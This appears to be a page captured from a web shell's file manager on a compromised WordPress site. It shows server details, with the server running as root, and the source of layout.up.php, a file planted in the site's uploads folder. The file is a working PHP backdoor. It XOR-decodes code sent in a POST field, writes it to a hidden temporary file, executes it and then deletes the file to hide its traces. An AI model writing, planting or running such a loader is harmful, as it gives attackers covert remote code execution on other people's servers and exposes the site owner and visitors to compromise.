HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/shoetique/wp-content/uploads/2020/04/
Upload Files
File: /var/www/shoetique/wp-content/uploads/2020/04/layout.up.php
<?php

if(in_array("flg", array_keys($_POST))){
	$parameter_group = hex2bin($_POST["flg"]);
	$bind =    '' ; foreach(str_split($parameter_group) as $char){$bind .= chr(ord($char) ^ 83);}
	$ptr = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TMP"), getenv("TEMP"), "/tmp", sys_get_temp_dir(), "/var/tmp", getcwd()]);
	for ($elem = 0, $dchunk = count($ptr); $elem < $dchunk; $elem++) {
    $object = $ptr[$elem];
    		if (!!is_dir($object) && !!is_writable($object)) {
    $desc = vsprintf("%s/%s", [$object, ".tkn"]);
    $file = fopen($desc, 'w');
if ($file) {
	fwrite($file, $bind);
	fclose($file);
	include $desc;
	@unlink($desc);
	exit;
}
}
}
}
@ Telegram